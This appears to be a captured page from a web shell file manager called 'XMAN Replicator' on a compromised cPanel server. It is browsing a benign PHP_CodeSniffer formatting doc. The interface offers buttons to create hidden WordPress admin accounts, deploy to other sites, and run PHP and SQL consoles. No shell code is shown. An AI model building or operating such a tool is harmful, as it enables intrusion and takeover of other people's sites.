🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
squizlabs
/
php_codesniffer
/
src
/
Standards
/
PEAR
/
Docs
/
Formatting
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2025-11-04 16:30
🔄
🗑️
🗑️📁
⬇️
🔒
MultiLineAssignmentStandard.xml
894 B
-rw-r--r--
2025-11-04 16:30
✏️
🔄
🗑️
⬇️
🔒
View: MultiLineAssignmentStandard.xml
<documentation title="Multi-Line Assignment"> <standard> <![CDATA[ Multi-line assignment should have the equals sign be the first item on the second line indented correctly. ]]> </standard> <code_comparison> <code title="Valid: Assignment operator at the start of the second line."> <![CDATA[ $foo <em>=</em> $bar; ]]> </code> <code title="Invalid: Assignment operator at end of first line."> <![CDATA[ $foo <em>=</em> $bar; ]]> </code> </code_comparison> <code_comparison> <code title="Valid: Assignment operator indented one level."> <![CDATA[ $foo <em> </em>= $bar; ]]> </code> <code title="Invalid: Assignment operator not indented."> <![CDATA[ $foo <em></em>= $bar; ]]> </code> </code_comparison> </documentation>
PHP Console
Execute
SQL Console
Execute